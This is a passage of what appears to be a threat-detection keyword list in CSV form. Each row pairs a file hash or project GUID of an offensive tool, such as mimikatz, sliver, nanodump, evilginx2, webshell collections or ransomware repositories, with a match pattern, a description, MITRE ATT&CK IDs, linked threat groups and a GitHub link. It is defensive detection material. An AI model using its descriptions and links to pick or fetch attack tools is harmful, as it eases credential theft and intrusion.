"*8a01a909a9fbaeb9d1061774811d0d2b165ff7dd199fea5543a75773bd5b13a7*",".{0,1000}8a01a909a9fbaeb9d1061774811d0d2b165ff7dd199fea5543a75773bd5b13a7.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","#filehash","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","30572" "*8a03202d0bdc6af38995b2b3d19f83075d390b85cd38df6cbc2d6093a3c14125*",".{0,1000}8a03202d0bdc6af38995b2b3d19f83075d390b85cd38df6cbc2d6093a3c14125.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","30573" 
"*8a0f503edc5f450e94323d0d1cc10fb2f199f6bafdad02f382c46f5b501c98fb*",".{0,1000}8a0f503edc5f450e94323d0d1cc10fb2f199f6bafdad02f382c46f5b501c98fb.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","30575" "*8a131449c4f5bffc5ae0cda597df9d17a3dff1d02422c890622c0359ee0a03f1*",".{0,1000}8a131449c4f5bffc5ae0cda597df9d17a3dff1d02422c890622c0359ee0a03f1.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","30576" "*8a14ac67d5d8ec601c353b0d7faebd6753e34f283797e201544ee5ef32317e91*",".{0,1000}8a14ac67d5d8ec601c353b0d7faebd6753e34f283797e201544ee5ef32317e91.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","30577" "*8A15D28C-252A-4FCC-8BBD-BC3802C0320A*",".{0,1000}8A15D28C\-252A\-4FCC\-8BBD\-BC3802C0320A.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. 
Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","#GUIDproject","N/A","10","10","1225","323","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z","30578" "*8a15e1d1589aeac183ce00830f32e9399f88f1db811f00e537a5fac1ac8002a0*",".{0,1000}8a15e1d1589aeac183ce00830f32e9399f88f1db811f00e537a5fac1ac8002a0.{0,1000}","offensive_tool_keyword","NamedPipeMaster","a tool used to analyze monitor and interact with named pipes - allows dll injection and impersonation","T1055.001 - T1134.001 - T1010 - T1550.002","TA0007 - TA0008 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/zeze-zeze/NamedPipeMaster","1","0","#filehash","N/A","9","2","161","15","2024-10-27T05:24:11Z","2024-08-23T02:03:44Z","30579" "*8a1699ce5630406091ec92ceec25f46a587888d228f3a9322dbaf9857cb3b5b7*",".{0,1000}8a1699ce5630406091ec92ceec25f46a587888d228f3a9322dbaf9857cb3b5b7.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","0","#filehash","N/A","7","10","1159","141","2024-07-12T23:31:35Z","2019-08-08T20:18:18Z","30580" "*8a22596f3783d65822de3eee7a72899699d1fffb885404ddf9c1cb0b8b780442*",".{0,1000}8a22596f3783d65822de3eee7a72899699d1fffb885404ddf9c1cb0b8b780442.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","30585" 
"*8a24643b1ae79babbba0995d870bf0992cfc9acfef6459727c603ef5b61c261f*",".{0,1000}8a24643b1ae79babbba0995d870bf0992cfc9acfef6459727c603ef5b61c261f.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","0","#filehash","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","30586" "*8a274c53950fe680f5b5eb76594aa0b30facdf93187277d03653334a5224f6a0*",".{0,1000}8a274c53950fe680f5b5eb76594aa0b30facdf93187277d03653334a5224f6a0.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","30587" "*8a2d02874922312a9e7f9bceabd0aca41246bc3bd0a172d149ad357c46d297ac*",".{0,1000}8a2d02874922312a9e7f9bceabd0aca41246bc3bd0a172d149ad357c46d297ac.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","30588" "*8a2f2dcdf0a2f4b3bf2c7ac94205e769dfcdb7c161df5a8d9df52935dbaeb936*",".{0,1000}8a2f2dcdf0a2f4b3bf2c7ac94205e769dfcdb7c161df5a8d9df52935dbaeb936.{0,1000}","offensive_tool_keyword","DEDSEC-RANSOMWARE","dedsec ransomware","T1486 - T1489 - T1490 - T1495 - T1488 - T1482","TA0040 - TA0043 - TA0042 - TA0009 - TA0010","N/A","N/A","Ransomware","https://github.com/xelroth/DEDSEC-RANSOMWARE","1","0","#filehash","N/A","10","1","7","1","2024-05-17T11:12:23Z","2024-05-17T10:34:03Z","30591" 
"*8a30a6a44efd71aa9a771f4d9864be4c3c9d8074adc828018ce774764e8036a9*",".{0,1000}8a30a6a44efd71aa9a771f4d9864be4c3c9d8074adc828018ce774764e8036a9.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","30593" "*8a30ec054667ecd1bd27a853f9cfc161e6e5d7012a5ab62adf199fa87badc502*",".{0,1000}8a30ec054667ecd1bd27a853f9cfc161e6e5d7012a5ab62adf199fa87badc502.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","30594" "*8a3bfd492f149d5c83675dd30e6ad94160534c980665609d6142f246552ac684*",".{0,1000}8a3bfd492f149d5c83675dd30e6ad94160534c980665609d6142f246552ac684.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","#filehash","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","30596" "*8a3d9dde4d2e42261f08cd41acec9917920b1b926471825e0c10751c14a53cad*",".{0,1000}8a3d9dde4d2e42261f08cd41acec9917920b1b926471825e0c10751c14a53cad.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - 
T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","30597" "*8a417e475065810997e9920df3b411696a4d494abb4204921fd6cb54ff455daa*",".{0,1000}8a417e475065810997e9920df3b411696a4d494abb4204921fd6cb54ff455daa.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","30599" "*8a496c84ce56714227135340a42fb720d04f4f9038e46b1e525e6fbdc87434e8*",".{0,1000}8a496c84ce56714227135340a42fb720d04f4f9038e46b1e525e6fbdc87434e8.{0,1000}","offensive_tool_keyword","pretender","MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS - LLMNR and NetBIOS-NS spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/RedTeamPentesting/pretender","1","0","#filehash","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","30600" "*8a4fcb53f64c79e74399d228582e80979dc95eafe52ac7708bd353284fd8f35b*",".{0,1000}8a4fcb53f64c79e74399d228582e80979dc95eafe52ac7708bd353284fd8f35b.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - 
TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","30601" "*8A516D69-BA38-429F-AFFE-C571B5C1E482*",".{0,1000}8A516D69\-BA38\-429F\-AFFE\-C571B5C1E482.{0,1000}","offensive_tool_keyword","MakeMeAdmin","Enables users to elevate themselves to administrator-level rights","T1078 - T1059 - T1087","TA0004","N/A","N/A","Privilege Escalation","https://github.com/pseymour/MakeMeAdmin","1","0","#GUIDproject","N/A","9","5","430","94","2024-12-22T02:56:23Z","2018-05-29T19:42:58Z","30602" "*8a56ab0ff1d36594b9c06968b1aff8c6537dffc8e7695729cc419db4c8364d00*",".{0,1000}8a56ab0ff1d36594b9c06968b1aff8c6537dffc8e7695729cc419db4c8364d00.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","0","#filehash","N/A","10","10","253","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z","30604" "*8a575a3e31ecbc724c5b7755ef14a0f645da3cd33ee57f9c91d74b1d94cdf772*",".{0,1000}8a575a3e31ecbc724c5b7755ef14a0f645da3cd33ee57f9c91d74b1d94cdf772.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","#filehash","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","30605" "*8a586d7528567dec07746cd375daf9cf8828abee9806fda6125d73323d4fbee4*",".{0,1000}8a586d7528567dec07746cd375daf9cf8828abee9806fda6125d73323d4fbee4.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 
- T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","30606" "*8a5d969cab714560a2c7109d7a70bf653d860b846929d2db55782f4ec2604597*",".{0,1000}8a5d969cab714560a2c7109d7a70bf653d860b846929d2db55782f4ec2604597.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","30610" "*8a65c348023a1a5555beb0cde66891fd39dcbd8e6fc02c1ce2022ac2afe68a5e*",".{0,1000}8a65c348023a1a5555beb0cde66891fd39dcbd8e6fc02c1ce2022ac2afe68a5e.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","30611" "*8a76966ffd6c4c29c203928df3e585e3384588e7ea2a70ab9f6f6d1bcf16ecd7*",".{0,1000}8a76966ffd6c4c29c203928df3e585e3384588e7ea2a70ab9f6f6d1bcf16ecd7.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","30612" 
"*8a92acfe944c48f247b50ea26cb82f367e668959c115739c025d1ad4ca59a27a*",".{0,1000}8a92acfe944c48f247b50ea26cb82f367e668959c115739c025d1ad4ca59a27a.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","30615" "*8a997da8acb30a57bc25ad0913fd6ad163cb6829e40344ac4b352ef0674c0379*",".{0,1000}8a997da8acb30a57bc25ad0913fd6ad163cb6829e40344ac4b352ef0674c0379.{0,1000}","offensive_tool_keyword","POC","local privilege escalation Proof-of-Concept exploit for CVE-2024-1086 working on most Linux kernels between v5.14 and v6.6","T1068 - T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Notselwyn/CVE-2024-1086","1","0","#filehash #linux","CVE-2024-1086 POC","10","10","2357","314","2024-04-17T16:09:54Z","2024-03-20T21:16:41Z","30616" "*8aa085e49959c67e804b50f07be758f3b9bf46f3da8a0e6612d6bf4f089f603e*",".{0,1000}8aa085e49959c67e804b50f07be758f3b9bf46f3da8a0e6612d6bf4f089f603e.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","30617" "*8aa1f48415cfbe283b446c451d7c834234a9e6cf564d0d45a2803ed7a739c4f8*",".{0,1000}8aa1f48415cfbe283b446c451d7c834234a9e6cf564d0d45a2803ed7a739c4f8.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","30618" "*8aac7bb51d605351a79f988d1b1772ae94d4b8ab4622118259effad125719e99*",".{0,1000}8aac7bb51d605351a79f988d1b1772ae94d4b8ab4622118259effad125719e99.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","30619" "*8aadca4c38166f4dc6f70126b094c2b86d7150fecf48bdcee668cc29b35001df*",".{0,1000}8aadca4c38166f4dc6f70126b094c2b86d7150fecf48bdcee668cc29b35001df.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","30620" "*8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA6AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABl4ZX1IYD7piGA*",".{0,1000}8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA6AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABl4ZX1IYD7piGA.{0,1000}","offensive_tool_keyword","NetRipper","NetRipper - Smart traffic sniffing for penetration testers","T1173 - T1557 - T1573.001 - T1056.001","TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/NytroRST/NetRipper","1","0","N/A","N/A","10","10","1368","318","2022-06-17T21:08:54Z","2015-07-14T20:31:04Z","30621" 
"*8ab8e1d302f81af6f3c240642489b297c549de98a7e46c8436cba750bf288b51*",".{0,1000}8ab8e1d302f81af6f3c240642489b297c549de98a7e46c8436cba750bf288b51.{0,1000}","offensive_tool_keyword","Godzilla","Webshell Manager Tool that provide request proxy, server info, RCE shell, terminal execution, memory shell, port forwarding, and MSF bind/reverse shell capabilities.","T1100 - T1018 - T1059 - T1090 - T1021 - T1205 - T1105 - T1568","TA0001 - TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/BeichenDream/Godzilla","1","0","#filehash","N/A","10","10","4096","551","2024-07-17T07:56:35Z","2020-08-17T17:27:56Z","30622" "*8aba74be7acef3c84cef0163411298aa994872347a4ac84cc0a0d19ddf0eb65c*",".{0,1000}8aba74be7acef3c84cef0163411298aa994872347a4ac84cc0a0d19ddf0eb65c.{0,1000}","offensive_tool_keyword","prefetch-tool","Windows KASLR bypass using prefetch side-channel CVE-2024-21345 exploitation","T1564.007","TA0004","N/A","N/A","Privilege Escalation","https://github.com/exploits-forsale/prefetch-tool","1","0","#filehash","N/A","8","1","90","10","2024-04-26T05:40:32Z","2024-04-26T05:00:27Z","30623" "*8ac384fed6ad25cb08874eb3dc9b45c80084fa5518ec5a7fa79e3f5d5e40b66e*",".{0,1000}8ac384fed6ad25cb08874eb3dc9b45c80084fa5518ec5a7fa79e3f5d5e40b66e.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","#filehash","N/A","10","10","2231","405","2025-04-21T03:17:20Z","2017-04-05T17:05:10Z","30624" "*8ace2f6b59f88eea47c07022c330c7fc91811d1a9f39148a3212f844a2dcd9a4*",".{0,1000}8ace2f6b59f88eea47c07022c330c7fc91811d1a9f39148a3212f844a2dcd9a4.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. 
Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","30625" "*8adec30a4cdb8fce2a24ab2bfcf1849324fd0639e9ce73f7c250e979ce5df0c4*",".{0,1000}8adec30a4cdb8fce2a24ab2bfcf1849324fd0639e9ce73f7c250e979ce5df0c4.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","30628" "*8adec30a4cdb8fce2a24ab2bfcf1849324fd0639e9ce73f7c250e979ce5df0c4*",".{0,1000}8adec30a4cdb8fce2a24ab2bfcf1849324fd0639e9ce73f7c250e979ce5df0c4.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","30629" "*8ae33d1da163dd41ff4bfe07f9b290d6fa2a46b592735ec9734477534760ea5e*",".{0,1000}8ae33d1da163dd41ff4bfe07f9b290d6fa2a46b592735ec9734477534760ea5e.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","#filehash","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","30631" 
"*8ae7a65345d809173343b02d58019e287e108d4688e483d761c89976e3ab2c9e*",".{0,1000}8ae7a65345d809173343b02d58019e287e108d4688e483d761c89976e3ab2c9e.{0,1000}","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tool","https://github.com/BeichenDream/SharpToken","1","0","#filehash","N/A","N/A","5","467","66","2023-11-24T19:21:57Z","2022-06-30T07:34:57Z","30632" "*8ae9eef729fd1a1c02406804d5c54d7dcd14507b77110ed543360fdb4f5b2f6d*",".{0,1000}8ae9eef729fd1a1c02406804d5c54d7dcd14507b77110ed543360fdb4f5b2f6d.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","30633" "*8aec1bef3b7e7e8d8adcf79bdc1d0efcd6eaa94c2fa22e42dd1b21ecc49333cd*",".{0,1000}8aec1bef3b7e7e8d8adcf79bdc1d0efcd6eaa94c2fa22e42dd1b21ecc49333cd.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - 
TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","30634" "*8aec1bef3b7e7e8d8adcf79bdc1d0efcd6eaa94c2fa22e42dd1b21ecc49333cd*",".{0,1000}8aec1bef3b7e7e8d8adcf79bdc1d0efcd6eaa94c2fa22e42dd1b21ecc49333cd.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","30635" "*8aec1bef3b7e7e8d8adcf79bdc1d0efcd6eaa94c2fa22e42dd1b21ecc49333cd*",".{0,1000}8aec1bef3b7e7e8d8adcf79bdc1d0efcd6eaa94c2fa22e42dd1b21ecc49333cd.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - 
